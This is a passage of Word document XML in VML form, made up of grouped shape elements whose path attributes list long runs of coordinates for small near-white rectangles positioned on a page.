078,2878,7078,2877,7078,2875,7078,2874,7078,2873,7078,2872,7078,2870,7078,2869,7078,2868,7078,2866,7078,2865,7078,2863,7078,2862,7078,2860,7078,2859,7078,2857,7078,2855,7078,2854,7078,2852,7078,2850,7078,2848,7078,2846,7078,2844,7078,2842,7078,2840,7078,2838,7078,2836,7078,2834,7078,2832,7078,2830,7078,2828,7078,2825,7078,2823,7078,2821,7078,2818,7078,2816,7078,2813,7078,2811,7078,2808,7078,2805,7078,2803,7078,2800,7078,2797,7078,2794,7078,2791,7078,2788,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7078,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7077,2785,7076,2785,7076,2785,7076,2785,7076,2785,7075,2785,7075,2785,7075,2785,7075,2785,7074,2785,7074,2785,7073,2785,7073,2785,7073,2785,7072,2785,7072,2785,7071,2785,7070,2785,7070,2785,7069,2785,7069,2785,7068,2785,7067,2785,7066,2785,7066,2785,7065,2785,7064,2785,7063,2785,7062,2785,7061,2785,7060,2785,7059,2785,7057,2785,7056,2785,7055,2785,7054,2785,7052,2785,7051,2785,7050,2785,7048,2785,7046,2785,7045,2785,7043,2785,7041,2785,7040,2785,7038,2785,7036,2785,7034,2785,7032,2785,7030,2785,7028,2785,7026,2785,7023,2785,7021,2785,7019,2785,7016,2785,7014,2785,7011,2785,7008,2785,7006,2785,7003,2785,7000,2785,6997,2785,6994,2785,6991,2785,6988,2785,6985,2785,6981,2785,6978,2785,6974,2785,6971,2785,6967,2785,6963,2785,6960,2785,6956,2785,6952,2785,6948,2785,6944,2785,6939,2785,6935,2785,6931,2785,6926,2785,6922,2785,6917,2785,6912,2785,6907,2785,6902,2785,6897,2785,6892,2785,6887,2785,6881,2785,6876,2785,6871,2785,6865,2785,6859,2785,6853,2785,6847,2785,6841,2785,6835,2785,6829,2785,6822e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:371.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,7430" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:7430;width:130;height:270" coordorigin="2290,7430" coordsize="130,270" path="m2305,7453l2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2305,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2306,7453,2307,7453,2307,7453,2307,7453,2307,7453,2307,7453,2307,7453,2308,7453,2308,7453,2308,7453,2308,7453,2309,7453,2309,7453,2309,7453,2310,7453,2310,7453,2310,7453,2311,7453,2311,7453,2312,7453,2312,7453,2313,7453,2313,7453,2314,7453,2314,7453,2315,7453,2315,7453,2316,7453,2316,7453,2317,7453,2318,7453,2318,7453,2319,7453,2320,7453,2321,7453,2321,7453,2322,7453,2323,7453,2324,7453,2325,7453,2326,7453,2327,7453,2328,7453,2329,7453,2330,7453,2331,7453,2332,7453,2333,7453,2334,7453,2335,7453,2336,7453,2338,7453,2339,7453,2340,7453,2342,7453,2343,7453,2344,7453,2346,7453,2347,7453,2349,7453,2350,7453,2352,7453,2354,7453,2355,7453,2357,7453,2359,7453,2361,7453,2362,7453,2364,7453,2366,7453,2368,7453,2370,7453,2372,7453,2374,7453,2376,7453,2379,7453,2381,7453,2383,7453,2385,7453,2388,7453,2390,7453,2392,7453,2395,7453,2397,7453,2400,7453,2403,7453,2405,7453,2408,7453,2411,7453,2414,7453,2416,7453,2419,7453,2422,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7453,2425,7454,2425,7454,2425,7454,2425,7454,2425,7454,2425,7455,2425,7455,2425,7455,2425,7455,2425,7456,2425,7456,2425,7456,2425,7457,2425,7457,2425,7458,2425,7458,2425,7459,2425,7459,2425,7460,2425,7460,2425,7461,2425,7462,2425,7462,2425,7463,2425,7464,2425,7465,2425,7466,2425,7467,2425,7467,2425,7468,2425,7469,2425,7471,2425,7472,2425,7473,2425,7474,2425,7475,2425,7477,2425,7478,2425,7479,2425,7481,2425,7482,2425,7484,2425,7485,2425,7487,2425,7489,2425,7491,2425,7492,2425,7494,2425,7496,2425,7498,2425,7500,2425,7502,2425,7505,2425,7507,2425,7509,2425,7512,2425,7514,2425,7517,2425,7519,2425,7522,2425,7525,2425,7527,2425,7530,2425,7533,2425,7536,2425,7539,2425,7542,2425,7546,2425,7549,2425,7552,2425,7556,2425,7559,2425,7563,2425,7567,2425,7571,2425,7575,2425,7578,2425,7583,2425,7587,2425,7591,2425,7595,2425,7600,2425,7604,2425,7609,2425,7613,2425,7618,2425,7623,2425,7628,2425,7633,2425,7638,2425,7643,2425,7649,2425,7654,2425,7660,2425,7665,2425,7671,2425,7677,2425,7683,2425,7689,2425,7695,2425,7702,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2425,7708,2424,7708,2424,7708,2424,7708,2424,7708,2424,7708,2424,7708,2424,7708,2423,7708,2423,7708,2423,7708,2423,7708,2423,7708,2422,7708,2422,7708,2422,7708,2422,7708,2421,7708,2421,7708,2421,7708,2420,7708,2420,7708,2420,7708,2419,7708,2419,7708,2418,7708,2418,7708,2417,7708,2417,7708,2416,7708,2416,7708,2415,7708,2415,7708,2414,7708,2413,7708,2413,7708,2412,7708,2411,7708,2411,7708,2410,7708,2409,7708,2408,7708,2407,7708,2407,7708,2406,7708,2405,7708,2404,7708,2403,7708,2402,7708,2401,7708,2400,7708,2399,7708,2398,7708,2396,7708,2395,7708,2394,7708,2393,7708,2391,7708,2390,7708,2389,7708,2387,7708,2386,7708,2384,7708,2383,7708,2381,7708,2380,7708,2378,7708,2377,7708,2375,7708,2373,7708,2372,7708,2370,7708,2368,7708,2366,7708,2364,7708,2362,7708,2360,7708,2358,7708,2356,7708,2354,7708,2352,7708,2350,7708,2347,7708,2345,7708,2343,7708,2340,7708,2338,7708,2335,7708,2333,7708,2330,7708,2328,7708,2325,7708,2322,7708,2320,7708,2317,7708,2314,7708,2311,7708,2308,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7708,2305,7707,2305,7707,2305,7707,2305,7707,2305,7707,2305,7707,2305,7707,2305,7706,2305,7706,2305,7706,2305,7706,2305,7706,2305,7705,2305,7705,2305,7705,2305,7704,2305,7704,2305,7703,2305,7703,2305,7702,2305,7702,2305,7701,2305,7701,2305,7700,2305,7700,2305,7699,2305,7698,2305,7697,2305,7697,2305,7696,2305,7695,2305,7694,2305,7693,2305,7692,2305,7691,2305,7690,2305,7689,2305,7688,2305,7687,2305,7685,2305,7684,2305,7683,2305,7681,2305,7680,2305,7678,2305,7677,2305,7675,2305,7674,2305,7672,2305,7670,2305,7668,2305,7666,2305,7664,2305,7662,2305,7660,2305,7658,2305,7656,2305,7654,2305,7651,2305,7649,2305,7647,2305,7644,2305,7641,2305,7639,2305,7636,2305,7633,2305,7630,2305,7627,2305,7624,2305,7621,2305,7618,2305,7615,2305,7612,2305,7608,2305,7605,2305,7601,2305,7598,2305,7594,2305,7590,2305,7586,2305,7582,2305,7578,2305,7574,2305,7570,2305,7565,2305,7561,2305,7556,2305,7552,2305,7547,2305,7542,2305,7538,2305,7533,2305,7528,2305,7522,2305,7517,2305,7512,2305,7506,2305,7501,2305,7495,2305,7489,2305,7484,2305,7478,2305,7472,2305,7465,2305,7459,2305,7453e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:371.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,7430" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:7430;width:130;height:270" coordorigin="2770,7430" coordsize="130,270" path="m2785,7453l2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2785,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2786,7453,2787,7453,2787,7453,2787,7453,2787,7453,2787,7453,2787,7453,2788,7453,2788,7453,2788,7453,2788,7453,2788,7453,2789,7453,2789,7453,2789,7453,2790,7453,2790,7453,2790,7453,2791,7453,2791,7453,2791,7453,2792,7453,2792,7453,2793,7453,2793,7453,2794,7453,2794,7453,2795,7453,2795,7453,2796,7453,2797,7453,2797,7453,2798,7453,2799,7453,2799,7453,2800,7453,2801,7453,2802,7453,2802,7453,2803,7453,2804,7453,2805,7453,2806,7453,2807,7453,2808,7453,2809,7453,2810,7453,2811,7453,2812,7453,2813,7453,2814,7453,2815,7453,2817,7453,2818,7453,2819,7453,2821,7453,2822,7453,2823,7453,2825,7453,2826,7453,2828,7453,2829,7453,2831,7453,2832,7453,2834,7453,2836,7453,2837,7453,2839,7453,2841,7453,2843,7453,2845,7453,2846,7453,2848,7453,2850,7453,2852,7453,2855,7453,2857,7453,2859,7453,2861,7453,2863,7453,2866,7453,2868,7453,2870,7453,2873,7453,2875,7453,2878,7453,2880,7453,2883,7453,2885,7453,2888,7453,2891,7453,2894,7453,2897,7453,2900,7453,2902,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7453,2905,7454,2905,7454,2905,7454,2905,7454,2905,7454,2905,7455,2905,7455,2905,7455,2905,7455,2905,7456,2905,7456,2905,7456,2905,7457,2905,7457,2905,7458,2905,7458,2905,7459,2905,7459,2905,7460,2905,7460,2905,7461,2905,7462,2905,7462,2905,7463,2905,7464,2905,7465,2905,7466,2905,7467,2905,7467,2905,7468,2905,7469,2905,7471,2905,7472,2905,7473,2905,7474,2905,7475,2905,7477,2905,7478,2905,7479,2905,7481,2905,7482,2905,7484,2905,7485,2905,7487,2905,7489,2905,7491,2905,7492,2905,7494,2905,7496,2905,7498,2905,7500,2905,7502,2905,7505,2905,7507,2905,7509,2905,7512,2905,7514,2905,7517,2905,7519,2905,7522,2905,7525,2905,7527,2905,7530,2905,7533,2905,7536,2905,7539,2905,7542,2905,7546,2905,7549,2905,7552,2905,7556,2905,7559,2905,7563,2905,7567,2905,7571,2905,7575,2905,7578,2905,7583,2905,7587,2905,7591,2905,7595,2905,7600,2905,7604,2905,7609,2905,7613,2905,7618,2905,7623,2905,7628,2905,7633,2905,7638,2905,7643,2905,7649,2905,7654,2905,7660,2905,7665,2905,7671,2905,7677,2905,7683,2905,7689,2905,7695,2905,7702,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2905,7708,2904,7708,2904,7708,2904,7708,2904,7708,2904,7708,2904,7708,2904,7708,2903,7708,2903,7708,2903,7708,2903,7708,2902,7708,2902,7708,2902,7708,2902,7708,2901,7708,2901,7708,2901,7708,2900,7708,2900,7708,2899,7708,2899,7708,2899,7708,2898,7708,2898,7708,2897,7708,2897,7708,2896,7708,2895,7708,2895,7708,2894,7708,2894,7708,2893,7708,2892,7708,2892,7708,2891,7708,2890,7708,2889,7708,2888,7708,2888,7708,2887,7708,2886,7708,2885,7708,2884,7708,2883,7708,2882,7708,2881,7708,2880,7708,2879,7708,2878,7708,2877,7708,2875,7708,2874,7708,2873,7708,2872,7708,2870,7708,2869,7708,2868,7708,2866,7708,2865,7708,2863,7708,2862,7708,2860,7708,2859,7708,2857,7708,2855,7708,2854,7708,2852,7708,2850,7708,2848,7708,2846,7708,2844,7708,2842,7708,2840,7708,2838,7708,2836,7708,2834,7708,2832,7708,2830,7708,2828,7708,2825,7708,2823,7708,2821,7708,2818,7708,2816,7708,2813,7708,2811,7708,2808,7708,2805,7708,2803,7708,2800,7708,2797,7708,2794,7708,2791,7708,2788,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7708,2785,7707,2785,7707,2785,7707,2785,7707,2785,7707,2785,7707,2785,7707,2785,7706,2785,7706,2785,7706,2785,7706,2785,7706,2785,7705,2785,7705,2785,7705,2785,7704,2785,7704,2785,7703,2785,7703,2785,7702,2785,7702,2785,7701,2785,7701,2785,7700,2785,7700,2785,7699,2785,7698,2785,7697,2785,7697,2785,7696,2785,7695,2785,7694,2785,7693,2785,7692,2785,7691,2785,7690,2785,7689,2785,7688,2785,7687,2785,7685,2785,7684,2785,7683,2785,7681,2785,7680,2785,7678,2785,7677,2785,7675,2785,7674,2785,7672,2785,7670,2785,7668,2785,7666,2785,7664,2785,7662,2785,7660,2785,7658,2785,7656,2785,7654,2785,7651,2785,7649,2785,7647,2785,7644,2785,7641,2785,7639,2785,7636,2785,7633,2785,7630,2785,7627,2785,7624,2785,7621,2785,7618,2785,7615,2785,7612,2785,7608,2785,7605,2785,7601,2785,7598,2785,7594,2785,7590,2785,7586,2785,7582,2785,7578,2785,7574,2785,7570,2785,7565,2785,7561,2785,7556,2785,7552,2785,7547,2785,7542,2785,7538,2785,7533,2785,7528,2785,7522,2785,7517,2785,7512,2785,7506,2785,7501,2785,7495,2785,7489,2785,7484,2785,7478,2785,7472,2785,7465,2785,7459,2785,7453e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:8070;width:130;height:270" coordorigin="2290,8070" coordsize="130,270" path="m2305,8098l2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2305,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2306,8098,2307,8098,2307,8098,2307,8098,2307,8098,2307,8098,2307,8098,2308,8098,2308,8098,2308,8098,2308,8098,2309,8098,2309,8098,2309,8098,2310,8098,2310,8098,2310,8098,2311,8098,2311,8098,2312,8098,2312,8098,2313,8098,2313,8098,2314,8098,2314,8098,2315,8098,2315,8098,2316,8098,2316,8098,2317,8098,2318,8098,2318,8098,2319,8098,2320,8098,2321,8098,2321,8098,2322,8098,2323,8098,2324,8098,2325,8098,2326,8098,2327,8098,2328,8098,2329,8098,2330,8098,2331,8098,2332,8098,2333,8098,2334,8098,2335,8098,2336,8098,2338,8098,2339,8098,2340,8098,2342,8098,2343,8098,2344,8098,2346,8098,2347,8098,2349,8098,2350,8098,2352,8098,2354,8098,2355,8098,2357,8098,2359,8098,2361,8098,2362,8098,2364,8098,2366,8098,2368,8098,2370,8098,2372,8098,2374,8098,2376,8098,2379,8098,2381,8098,2383,8098,2385,8098,2388,8098,2390,8098,2392,8098,2395,8098,2397,8098,2400,8098,2403,8098,2405,8098,2408,8098,2411,8098,2414,8098,2416,8098,2419,8098,2422,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8098,2425,8099,2425,8099,2425,8099,2425,8099,2425,8099,2425,8099,2425,8099,2425,8100,2425,8100,2425,8100,2425,8100,2425,8101,2425,8101,2425,8101,2425,8102,2425,8102,2425,8103,2425,8103,2425,8104,2425,8104,2425,8105,2425,8105,2425,8106,2425,8106,2425,8107,2425,8108,2425,8109,2425,8109,2425,8110,2425,8111,2425,8112,2425,8113,2425,8114,2425,8115,2425,8116,2425,8117,2425,8118,2425,8119,2425,8121,2425,8122,2425,8123,2425,8125,2425,8126,2425,8128,2425,8129,2425,8131,2425,8132,2425,8134,2425,8136,2425,8138,2425,8140,2425,8142,2425,8144,2425,8146,2425,8148,2425,8150,2425,8152,2425,8155,2425,8157,2425,8159,2425,8162,2425,8165,2425,8167,2425,8170,2425,8173,2425,8176,2425,8179,2425,8182,2425,8185,2425,8188,2425,8191,2425,8194,2425,8198,2425,8201,2425,8205,2425,8208,2425,8212,2425,8216,2425,8220,2425,8224,2425,8228,2425,8232,2425,8236,2425,8241,2425,8245,2425,8249,2425,8254,2425,8259,2425,8264,2425,8268,2425,8273,2425,8278,2425,8284,2425,8289,2425,8294,2425,8300,2425,8305,2425,8311,2425,8317,2425,8322,2425,8328,2425,8334,2425,8341,2425,8347,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2425,8353,2424,8353,2424,8353,2424,8353,2424,8353,2424,8353,2424,8353,2424,8353,2423,8353,2423,8353,2423,8353,2423,8353,2423,8353,2422,8353,2422,8353,2422,8353,2422,8353,2421,8353,2421,8353,2421,8353,2420,8353,2420,8353,2420,8353,2419,8353,2419,8353,2418,8353,2418,8353,2417,8353,2417,8353,2416,8353,2416,8353,2415,8353,2415,8353,2414,8353,2413,8353,2413,8353,2412,8353,2411,8353,2411,8353,2410,8353,2409,8353,2408,8353,2407,8353,2407,8353,2406,8353,2405,8353,2404,8353,2403,8353,2402,8353,2401,8353,2400,8353,2399,8353,2398,8353,2396,8353,2395,8353,2394,8353,2393,8353,2391,8353,2390,8353,2389,8353,2387,8353,2386,8353,2384,8353,2383,8353,2381,8353,2380,8353,2378,8353,2377,8353,2375,8353,2373,8353,2372,8353,2370,8353,2368,8353,2366,8353,2364,8353,2362,8353,2360,8353,2358,8353,2356,8353,2354,8353,2352,8353,2350,8353,2347,8353,2345,8353,2343,8353,2340,8353,2338,8353,2335,8353,2333,8353,2330,8353,2328,8353,2325,8353,2322,8353,2320,8353,2317,8353,2314,8353,2311,8353,2308,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8353,2305,8352,2305,8352,2305,8352,2305,8352,2305,8352,2305,8352,2305,8351,2305,8351,2305,8351,2305,8351,2305,8350,2305,8350,2305,8350,2305,8349,2305,8349,2305,8348,2305,8348,2305,8347,2305,8347,2305,8346,2305,8346,2305,8345,2305,8344,2305,8344,2305,8343,2305,8342,2305,8341,2305,8340,2305,8339,2305,8338,2305,8337,2305,8336,2305,8335,2305,8334,2305,8333,2305,8332,2305,8331,2305,8329,2305,8328,2305,8327,2305,8325,2305,8324,2305,8322,2305,8321,2305,8319,2305,8317,2305,8315,2305,8314,2305,8312,2305,8310,2305,8308,2305,8306,2305,8303,2305,8301,2305,8299,2305,8297,2305,8294,2305,8292,2305,8289,2305,8287,2305,8284,2305,8281,2305,8279,2305,8276,2305,8273,2305,8270,2305,8267,2305,8263,2305,8260,2305,8257,2305,8254,2305,8250,2305,8246,2305,8243,2305,8239,2305,8235,2305,8231,2305,8227,2305,8223,2305,8219,2305,8215,2305,8211,2305,8206,2305,8202,2305,8197,2305,8193,2305,8188,2305,8183,2305,8178,2305,8173,2305,8168,2305,8162,2305,8157,2305,8152,2305,8146,2305,8141,2305,8135,2305,8129,2305,8123,2305,8117,2305,8111,2305,8104,2305,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:8070;width:130;height:270" coordorigin="2770,8070" coordsize="130,270" path="m2785,8098l2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2785,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2786,8098,2787,8098,2787,8098,2787,8098,2787,8098,2787,8098,2787,8098,2788,8098,2788,8098,2788,8098,2788,8098,2788,8098,2789,8098,2789,8098,2789,8098,2790,8098,2790,8098,2790,8098,2791,8098,2791,8098,2791,8098,2792,8098,2792,8098,2793,8098,2793,8098,2794,8098,2794,8098,2795,8098,2795,8098,2796,8098,2797,8098,2797,8098,2798,8098,2799,8098,2799,8098,2800,8098,2801,8098,2802,8098,2802,8098,2803,8098,2804,8098,2805,8098,2806,8098,2807,8098,2808,8098,2809,8098,2810,8098,2811,8098,2812,8098,2813,8098,2814,8098,2815,8098,2817,8098,2818,8098,2819,8098,2821,8098,2822,8098,2823,8098,2825,8098,2826,8098,2828,8098,2829,8098,2831,8098,2832,8098,2834,8098,2836,8098,2837,8098,2839,8098,2841,8098,2843,8098,2845,8098,2846,8098,2848,8098,2850,8098,2852,8098,2855,8098,2857,8098,2859,8098,2861,8098,2863,8098,2866,8098,2868,8098,2870,8098,2873,8098,2875,8098,2878,8098,2880,8098,2883,8098,2885,8098,2888,8098,2891,8098,2894,8098,2897,8098,2900,8098,2902,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8098,2905,8099,2905,8099,2905,8099,2905,8099,2905,8099,2905,8099,2905,8099,2905,8100,2905,8100,2905,8100,2905,8100,2905,8101,2905,8101,2905,8101,2905,8102,2905,8102,2905,8103,2905,8103,2905,8104,2905,8104,2905,8105,2905,8105,2905,8106,2905,8106,2905,8107,2905,8108,2905,8109,2905,8109,2905,8110,2905,8111,2905,8112,2905,8113,2905,8114,2905,8115,2905,8116,2905,8117,2905,8118,2905,8119,2905,8121,2905,8122,2905,8123,2905,8125,2905,8126,2905,8128,2905,8129,2905,8131,2905,8132,2905,8134,2905,8136,2905,8138,2905,8140,2905,8142,2905,8144,2905,8146,2905,8148,2905,8150,2905,8152,2905,8155,2905,8157,2905,8159,2905,8162,2905,8165,2905,8167,2905,8170,2905,8173,2905,8176,2905,8179,2905,8182,2905,8185,2905,8188,2905,8191,2905,8194,2905,8198,2905,8201,2905,8205,2905,8208,2905,8212,2905,8216,2905,8220,2905,8224,2905,8228,2905,8232,2905,8236,2905,8241,2905,8245,2905,8249,2905,8254,2905,8259,2905,8264,2905,8268,2905,8273,2905,8278,2905,8284,2905,8289,2905,8294,2905,8300,2905,8305,2905,8311,2905,8317,2905,8322,2905,8328,2905,8334,2905,8341,2905,8347,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2905,8353,2904,8353,2904,8353,2904,8353,2904,8353,2904,8353,2904,8353,2904,8353,2903,8353,2903,8353,2903,8353,2903,8353,2902,8353,2902,8353,2902,8353,2902,8353,2901,8353,2901,8353,2901,8353,2900,8353,2900,8353,2899,8353,2899,8353,2899,8353,2898,8353,2898,8353,2897,8353,2897,8353,2896,8353,2895,8353,2895,8353,2894,8353,2894,8353,2893,8353,2892,8353,2892,8353,2891,8353,2890,8353,2889,8353,2888,8353,2888,8353,2887,8353,2886,8353,2885,8353,2884,8353,2883,8353,2882,8353,2881,8353,2880,8353,2879,8353,2878,8353,2877,8353,2875,8353,2874,8353,2873,8353,2872,8353,2870,8353,2869,8353,2868,8353,2866,8353,2865,8353,2863,8353,2862,8353,2860,8353,2859,8353,2857,8353,2855,8353,2854,8353,2852,8353,2850,8353,2848,8353,2846,8353,2844,8353,2842,8353,2840,8353,2838,8353,2836,8353,2834,8353,2832,8353,2830,8353,2828,8353,2825,8353,2823,8353,2821,8353,2818,8353,2816,8353,2813,8353,2811,8353,2808,8353,2805,8353,2803,8353,2800,8353,2797,8353,2794,8353,2791,8353,2788,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8353,2785,8352,2785,8352,2785,8352,2785,8352,2785,8352,2785,8352,2785,8351,2785,8351,2785,8351,2785,8351,2785,8350,2785,8350,2785,8350,2785,8349,2785,8349,2785,8348,2785,8348,2785,8347,2785,8347,2785,8346,2785,8346,2785,8345,2785,8344,2785,8344,2785,8343,2785,8342,2785,8341,2785,8340,2785,8339,2785,8338,2785,8337,2785,8336,2785,8335,2785,8334,2785,8333,2785,8332,2785,8331,2785,8329,2785,8328,2785,8327,2785,8325,2785,8324,2785,8322,2785,8321,2785,8319,2785,8317,2785,8315,2785,8314,2785,8312,2785,8310,2785,8308,2785,8306,2785,8303,2785,8301,2785,8299,2785,8297,2785,8294,2785,8292,2785,8289,2785,8287,2785,8284,2785,8281,2785,8279,2785,8276,2785,8273,2785,8270,2785,8267,2785,8263,2785,8260,2785,8257,2785,8254,2785,8250,2785,8246,2785,8243,2785,8239,2785,8235,2785,8231,2785,8227,2785,8223,2785,8219,2785,8215,2785,8211,2785,8206,2785,8202,2785,8197,2785,8193,2785,8188,2785,8183,2785,8178,2785,8173,2785,8168,2785,8162,2785,8157,2785,8152,2785,8146,2785,8141,2785,8135,2785,8129,2785,8123,2785,8117,2785,8111,2785,8104,2785,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:435.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,8710" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:8710;width:130;height:270" coordorigin="2290,8710" coordsize="130,270" path="m2305,8728l2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2305,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2306,8728,2307,8728,2307,8728,2307,8728,2307,8728,2307,8728,2307,8728,2308,8728,2308,8728,2308,8728,2308,8728,2309,8728,2309,8728,2309,8728,2310,8728,2310,8728,2310,8728,2311,8728,2311,8728,2312,8728,2312,8728,2313,8728,2313,8728,2314,8728,2314,8728,2315,8728,2315,8728,2316,8728,2316,8728,2317,8728,2318,8728,2318,8728,2319,8728,2320,8728,2321,8728,2321,8728,2322,8728,2323,8728,2324,8728,2325,8728,2326,8728,2327,8728,2328,8728,2329,8728,2330,8728,2331,8728,2332,8728,2333,8728,2334,8728,2335,8728,2336,8728,2338,8728,2339,8728,2340,8728,2342,8728,2343,8728,2344,8728,2346,8728,2347,8728,2349,8728,2350,8728,2352,8728,2354,8728,2355,8728,2357,8728,2359,8728,2361,8728,2362,8728,2364,8728,2366,8728,2368,8728,2370,8728,2372,8728,2374,8728,2376,8728,2379,8728,2381,8728,2383,8728,2385,8728,2388,8728,2390,8728,2392,8728,2395,8728,2397,8728,2400,8728,2403,8728,2405,8728,2408,8728,2411,8728,2414,8728,2416,8728,2419,8728,2422,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8728,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8729,2425,8730,2425,8730,2425,8730,2425,8730,2425,8730,2425,8731,2425,8731,2425,8731,2425,8732,2425,8732,2425,8732,2425,8733,2425,8733,2425,8734,2425,8734,2425,8735,2425,8735,2425,8736,2425,8737,2425,8737,2425,8738,2425,8739,2425,8740,2425,8740,2425,8741,2425,8742,2425,8743,2425,8744,2425,8745,2425,8746,2425,8747,2425,8748,2425,8750,2425,8751,2425,8752,2425,8754,2425,8755,2425,8756,2425,8758,2425,8759,2425,8761,2425,8763,2425,8764,2425,8766,2425,8768,2425,8770,2425,8772,2425,8774,2425,8776,2425,8778,2425,8780,2425,8783,2425,8785,2425,8787,2425,8790,2425,8792,2425,8795,2425,8798,2425,8800,2425,8803,2425,8806,2425,8809,2425,8812,2425,8815,2425,8818,2425,8821,2425,8825,2425,8828,2425,8832,2425,8835,2425,8839,2425,8842,2425,8846,2425,8850,2425